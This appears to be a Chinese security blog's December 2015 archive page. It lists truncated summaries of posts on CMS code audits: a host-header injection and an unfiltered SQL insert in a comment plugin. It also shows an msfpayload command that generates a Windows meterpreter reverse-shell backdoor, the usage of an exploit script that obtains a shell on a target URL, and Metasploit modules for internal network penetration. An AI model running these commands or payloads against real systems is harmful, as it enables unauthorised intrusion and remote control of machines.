12 2015 档案
摘要:看文件 :/framework/model/www/site_model.php 66行估计主机头注入很少能发现。在多处调用了我们就直接拿留言板处测试。public function get_one_from_domain($domain='') { $sql = "SELECT site_id F...
阅读全文
摘要:想起早些年就已经很少玩审计了,后来因为合作方的原因就down了一份源码分析了一些,在很多地方都调用过滤函数。最后在评论一处发现了未过滤的地方,我们看看。见文件:function\plugs\Comment\product-content.php 97-109行$sql="insert into `o...
阅读全文
摘要:反弹的shell,这里介绍两种payload: Windows/meterpreter/reverse_tcp Windows/meterpreter/reverse_https windows/meterpreter/reverse_http 生成反弹后门: msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=...
阅读全文
摘要:利用脚本。exp:python jj.py http://123.123.123.123 ->直接GETSHELL python jj.py http://123.123.123.123 "whoami" ->执行命令#author:we8i&90secimport url...
阅读全文
摘要:下面附上内网渗透中可能用得上的msf 模块 scanner/portscan/syn SYN端口扫描scanner/portscan/tcp TCP端口扫描 auxiliary/scanner/smb/smb_login SMB登录测试扫描use windows/smb/psexec SMB登录,可
阅读全文

浙公网安备 33010602011771号